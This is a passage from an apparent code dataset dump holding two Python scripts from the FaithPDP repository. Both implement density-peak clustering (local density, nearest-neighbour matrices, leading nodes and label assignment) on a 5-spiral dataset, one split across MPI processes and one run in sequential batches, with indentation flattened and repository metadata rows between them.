def DensityAndBarDistance(ranX, X, i, subSize ):
if i == BatchNum - 1:
subX = ranX[i * subSize:, :]
else:
subX = ranX[i * subSize:(i + 1) * subSize, :]
TempRowNum = np.shape(subX)[0]
### Part against All distance
SubtDist = common.euclidian_dist(subX, X)
subDensity = common.ComputeLocalDensity(SubtDist, dc)
###patition is IMPORTANT!!!
subKNearInds = (np.argpartition(SubtDist, KNearest))[:, 0:KNearest]
subKNearDist = np.zeros((TempRowNum, KNearest), dtype='float32')
for row in range(TempRowNum):
subKNearDist[row, :] = SubtDist[row, subKNearInds[row, :]]
return subDensity, subKNearInds, subKNearDist
def ClusterIDAssignment(density, ledingNodes, LeadingDistance, K):
N = len(density)
Y = np.zeros(N,dtype="int")-1
potential = density * LeadingDistance
sortedPotentialInds = np.argsort(-1*potential)
for i in range(K):
Y[sortedPotentialInds[i]] = i
PathNodes = []
for j in range(N):
if Y[j] != -1:
continue
else:
PathNodes.append(j)
pa = ledingNodes[j]
while Y[pa] == -1:
pa = ledingNodes[pa]
PathNodes.append(pa)
#print("pa", pa, "path length:", len(PathNodes))
label = Y[pa]
for node in PathNodes:
Y[node] = label
PathNodes =[]
return Y
def FindLeadingNodeEasy(i, subsize, KNearDist,KNearInds, DensityAll, LeadingNodeInds, LeadingDistance):
if i == BatchNum - 1:
IDrange = range(i * subSize, N)
else:
IDrange = range(i * subSize, (i + 1) * subSize)
for nodeID in IDrange:
### solution One: sort KnearDist
distVec = KNearDist[nodeID, :]
distSortInds = np.argsort(distVec)
distVecSort = distVec[distSortInds]
RealDistSortInds = KNearInds[nodeID, distSortInds]
for j in range(KNearest):
possibleLeading = RealDistSortInds[j]
if DensityAll[possibleLeading] > DensityAll[nodeID]:
LeadingNodeInds[nodeID] = possibleLeading
LeadingDistance[nodeID] = distVecSort[j] ### Attention!
break ###find then finish!
if __name__ == "__main__":
X, Y = common.load_data("data/5Spiral50K.csv", label_index=3)
X = X[:, 1:]
#X, _, _ = common.max_min_norm(X)
N = np.shape(X)[0]
scaler = MinMaxScaler()
X = scaler.fit_transform(X)
dc = 0.2
BatchNum = 20 ### for 500K
#BatchNum = 20
## the width of bar matrix, storing the nearest neighbors' Indics and Distance
KNearest = 20
KNearInds = np.zeros((N, KNearest), dtype='int')
KNearDist = np.zeros((N, KNearest), dtype='float32')
DensityAll = np.zeros(N, dtype='float32')
t1 = time.time()
###### MPI Parallelism
comm = MPI.COMM_WORLD
size = comm.Get_size() #### 10 or 20, Now suppose N is Integer times of size.
rank = comm.Get_rank()
rankSize = int(N / size)
BeginID = int(rankSize * rank )
print("BeginID:", BeginID)
EndID = int(rankSize * (rank + 1) )
if rank == size-1: ####deal with the remaining a few samples when N is not the integer times of size
EndID = N
rankX = X[BeginID:EndID, ]
# comm.send(sum0, dest=size-1)
print("This is rank %d, on node2" % rank)
if rank == 0:
#subSize = int(N/BatchNum)
subSize = int(rankSize / BatchNum)
### limulate paralell with data independent sequential processing
#### Step One: compute rho and bar Distance matrices########
##############################################################
print("Computing local density and bar matrix....")
for i in range(BatchNum):
if (i % 5 ==0):
print("Batch No.", i , " of ",BatchNum)
## The last work takes all remainder
subDensity, subKNearInds, subKNearDist = DensityAndBarDistance(rankX, X, i, subSize)
##The last part
if i == BatchNum-1:
DensityAll[rankSize*rank+i * subSize:rankSize*(rank+1)] = subDensity
KNearInds[rankSize*rank+i * subSize:rankSize*(rank+1), :] = subKNearInds
KNearDist[rankSize*rank+i * subSize:rankSize*(rank+1), :] = subKNearDist
else:
DensityAll[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize] = subDensity
KNearInds[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize, :] = subKNearInds
KNearDist[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize, :] = subKNearDist
#####Collect data to process whose rank==0
for sendRank in range(1, size):
# recvDensity = comm.recv(source=sendRank, tag=1)
# recvKNearInds = comm.recv(source=sendRank, tag=2)
# recvKNearDist = comm.recv(source=sendRank, tag=3)####还需要再放置!!!
# DensityAll[rankSize * rank:rankSize * (rank + 1)] = recvDensity
# KNearInds[rankSize * rank:rankSize * (rank + 1), :] = recvKNearInds
# KNearDist[rankSize * rank :rankSize * (rank + 1), :] = recvKNearDist
recvEndID = rankSize * (sendRank + 1)
if sendRank == size-1:
recvEndID = N
DensityAll[rankSize * sendRank:recvEndID] = comm.recv(source=sendRank, tag=1)
KNearInds[rankSize * sendRank:recvEndID, :] = comm.recv(source=sendRank, tag=2)
KNearDist[rankSize * sendRank :recvEndID, :]= comm.recv(source=sendRank, tag=3) #
else:
#subSize = int(N/BatchNum)
subSize = int(rankSize / BatchNum)
### limulate paralell with data independent sequential processing
#### Step One: compute rho and bar Distance matrices########
##############################################################
print("Computing local density and bar matrix....")
for i in range(BatchNum):
if (i % 5 ==0):
print("Batch No.", i, " of ", BatchNum)
## The last work takes all remainder
subDensity, subKNearInds, subKNearDist = DensityAndBarDistance(rankX, X, i, subSize)
##The last part
if i == BatchNum-1:
BatchEndID = rankSize * (rank + 1)
if rank == size - 1:
BatchEndID = N
DensityAll[rankSize*rank+i * subSize:BatchEndID] = subDensity
KNearInds[rankSize*rank+i * subSize:BatchEndID, :] = subKNearInds
KNearDist[rankSize*rank+i * subSize:BatchEndID, :] = subKNearDist
else:
DensityAll[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize] = subDensity
KNearInds[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize, :] = subKNearInds
KNearDist[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize, :] = subKNearDist
SendEndID = rankSize * (rank + 1)
if rank == size - 1:
SendEndID = N
comm.send(DensityAll[rankSize * rank :SendEndID] , dest=0, tag = 1)
comm.send(KNearInds[rankSize * rank :SendEndID, :] , dest=0, tag = 2)
comm.send(KNearDist[rankSize * rank :SendEndID, :], dest=0, tag = 3)
comm.barrier()
print("density and matrices completed!")
if rank == 0: ### Step Two: compute leading nodes and leading distance ########
#############################################################
# DensityAllsortInds = np.argsort(DensityAll, 'descending')
# DensityAllsort = DensityAll[DensityAllsortInds]
#common.write_csv("KNearInds.csv", KNearInds)
#common.write_csv("DensityAll", DensityAll)
LeadingNodeInds = np.zeros(N, dtype="int")-1
LeadingDistance = np.zeros(N, dtype="float32")-1
print("Computing leading nodes and delta distance...")
for i in range(BatchNum):
## The last work takes all remainder
FindLeadingNodeEasy(i, subSize, KNearDist, KNearInds, DensityAll, LeadingNodeInds, LeadingDistance)
#### Step Three: compute leading nodes for those failed in Step Two ########
##############################################################
###Solution One, step A: sparse minicenters' distance matrix and extracted densities
NotFoundInds = np.array( [i for i in range(N) if LeadingNodeInds[i]==-1 ])
mcNum = len(NotFoundInds)
DensitysortInds = np.argsort(-DensityAll)
Densitysort = DensityAll[DensitysortInds]
### step B: Recomputing the distance between micro centers and the entire dataset
mCenterX = X[NotFoundInds, :] #### already in the order of density
mCenterDist = common.euclidian_dist(mCenterX, X) ###Solution Two
##mCenterDist = common.euclidian_dist(mCenterX, mCenterX) ###Solution one
for i in range(mcNum):### pay attention to Index Transfering
currInd = NotFoundInds[i]
if currInd == DensitysortInds[0] :
LeadingDistance[currInd] = max(mCenterDist[i, :])
continue
LeadingNodeInds[currInd] = DensitysortInds[0]
LeadingDistance[currInd] = mCenterDist[i, DensitysortInds[0]]
StopDensityInd = list(DensitysortInds) .index(currInd)
## Search Range
for j in range (1, StopDensityInd):
tmpj = DensitysortInds[j]
if mCenterDist[i,tmpj] < LeadingDistance[currInd]:
LeadingNodeInds[currInd] = tmpj
LeadingDistance[currInd] = mCenterDist[i, tmpj]
Y = ClusterIDAssignment(DensityAll, LeadingNodeInds, LeadingDistance, 5)
t2= time.time()
print("Time consumption (s):", t2-t1)
# print("Labels: \n",Y)
common.write_csv("Labels.csv",np.reshape(Y,(N,1)))
common.PlotCluster(X, Y)
####TESTING CODE#############
# D = common.euclidian_dist(X, X)
# lt1 = lt.LeadingTree(X_train=X, dc=0.2, lt_num=lt_num, D=D) # Constructing the lead tree for the entire dataset
# lt1.fit()
# print("leading distance diff:\n", LeadingDistance-lt1.delta)
| 10,742 | Python | .py | 207 | 40.869565 | 119 | 0.585087 | alanxuji/FaithPDP | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,599 | FFP-DP-5Spiral-S.py | alanxuji_FaithPDP/FFP-DP-5Spiral-S.py | import time
import numpy as np
from sklearn import datasets
from sklearn.preprocessing import MinMaxScaler
from utils import common
def DensityAndBarDistance(X,i ):
if i == BatchNum - 1:
subX = X[i * subSize:, :]
else:
subX = X[i * subSize:(i + 1) * subSize, :]
TempRowNum = np.shape(subX)[0]
### Part against All distance
SubtDist = common.euclidian_dist(subX, X)
subDensity = common.ComputeLocalDensity(SubtDist, dc)
###patition is IMPORTANT!!!
subKNearInds = (np.argpartition(SubtDist, KNearest))[:, 0:KNearest]
subKNearDist = np.zeros((TempRowNum, KNearest), dtype='float32')
for row in range(TempRowNum):
subKNearDist[row, :] = SubtDist[row, subKNearInds[row, :]]
return subDensity, subKNearInds, subKNearDist
def ClusterIDAssignment(density, ledingNodes, LeadingDistance, K):
N = len(density)
Y = np.zeros(N,dtype="int")-1
potential = density * LeadingDistance
sortedPotentialInds = np.argsort(-1*potential)
for i in range(K):
Y[sortedPotentialInds[i]] = i
PathNodes = []
for j in range(N):
if Y[j] != -1:
continue
else:
PathNodes.append(j)
pa = ledingNodes[j]
while Y[pa] == -1:
pa = ledingNodes[pa]
PathNodes.append(pa)
print("pa", pa, "path length:", len(PathNodes))
label = Y[pa]
for node in PathNodes:
Y[node] = label
PathNodes =[]
return Y
def FindLeadingNodeEasy(i, subsize, KNearDist,KNearInds, DensityAll, LeadingNodeInds, LeadingDistance):
if i == BatchNum - 1:
IDrange = range(i * subSize, N)
else:
IDrange = range(i * subSize, (i + 1) * subSize)
for nodeID in IDrange:
### solution One: sort KnearDist
distVec = KNearDist[nodeID, :]
distSortInds = np.argsort(distVec)
distVecSort = distVec[distSortInds]
RealDistSortInds = KNearInds[nodeID, distSortInds]
for j in range(KNearest):
possibleLeading = RealDistSortInds[j]
if DensityAll[possibleLeading] > DensityAll[nodeID]:
LeadingNodeInds[nodeID] = possibleLeading
LeadingDistance[nodeID] = distVecSort[j] ### Attention!
break ###find then finish!
if __name__ == "__main__":
lt_num = 8 # number of subtrees
wine = datasets.load_wine()
X, Y = common.load_data("data/5Spiral50K.csv", label_index=3)
X = X[:, 1:]
#X, _, _ = common.max_min_norm(X)
N = np.shape(X)[0]
scaler = MinMaxScaler()
X = scaler.fit_transform(X)
dc = 0.2
t1 = time.time()
BatchNum =500
subSize = int(N/BatchNum)
DensityAll = np.zeros(N, dtype='float32')
## the width of bar matrix, storing the nearest neighbors' Indics and Distance
KNearest = 20
KNearInds = np.zeros((N,KNearest), dtype='int')
KNearDist = np.zeros((N, KNearest), dtype='float32')
### limulate paralell with data independent sequential processing
#### Step One: compute rho and bar Distance matrices########
##############################################################
print("Computing local density and bar matrix....")
for i in range(BatchNum):
if (i % 5 ==0):
print("Worker No.", i , " of ",BatchNum)
## The last work takes all remainder
subDensity, subKNearInds, subKNearDist = DensityAndBarDistance(X,i)
##The last part
if i == BatchNum-1:
DensityAll[i * subSize:] = subDensity
KNearInds[i * subSize:, :] = subKNearInds
KNearDist[i * subSize:, :] = subKNearDist
else:
DensityAll[i * subSize:(i + 1) * subSize] = subDensity
KNearInds[i * subSize:(i + 1) * subSize, :] = subKNearInds
KNearDist[i * subSize:(i + 1) * subSize, :] = subKNearDist
#### Step Two: compute leading nodes and leading distance ########
##############################################################
# DensityAllsortInds = np.argsort(DensityAll, 'descending')
# DensityAllsort = DensityAll[DensityAllsortInds]
LeadingNodeInds = np.zeros(N, dtype="int")-1
LeadingDistance = np.zeros(N, dtype="float32")-1
print("Computing leading nodes and delta distance...")
for i in range(BatchNum):
## The last work takes all remainder
FindLeadingNodeEasy(i, subSize, KNearDist, KNearInds, DensityAll, LeadingNodeInds, LeadingDistance)
#### Step Three: compute leading nodes for those failed in Step Two ########
##############################################################
###Solution One, step A: sparse minicenters' distance matrix and extracted densities
NotFoundInds = np.array( [i for i in range(N) if LeadingNodeInds[i]==-1 ])
mcNum = len(NotFoundInds)
DensitysortInds = np.argsort(-DensityAll)
Densitysort = DensityAll[DensitysortInds]
### step B: Recomputing the distance between micro centers and the entire dataset
mCenterX = X[NotFoundInds, :] #### already in the order of density
mCenterDist = common.euclidian_dist(mCenterX, X) ###Solution Two
##mCenterDist = common.euclidian_dist(mCenterX, mCenterX) ###Solution one
for i in range(mcNum):### pay attention to Index Transfering
currInd = NotFoundInds[i]
if currInd == DensitysortInds[0] :
LeadingDistance[currInd] = max(mCenterDist[i, :])
continue
LeadingNodeInds[currInd] = DensitysortInds[0]
LeadingDistance[currInd] = mCenterDist[i, DensitysortInds[0]]
StopDensityInd = list(DensitysortInds) .index(currInd)
## Search Range
for j in range (1, StopDensityInd):
tmpj = DensitysortInds[j]
if mCenterDist[i,tmpj] < LeadingDistance[currInd]:
LeadingNodeInds[currInd] = tmpj
LeadingDistance[currInd] = mCenterDist[i, tmpj]
Y = ClusterIDAssignment(DensityAll, LeadingNodeInds, LeadingDistance, 5)
t2= time.time()
print("Time consumption (s):", t2-t1)
common.PlotCluster(X, Y)
| 6,309 | Python | .py | 135 | 37.592593 | 108 | 0.605936 | alanxuji/FaithPDP | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.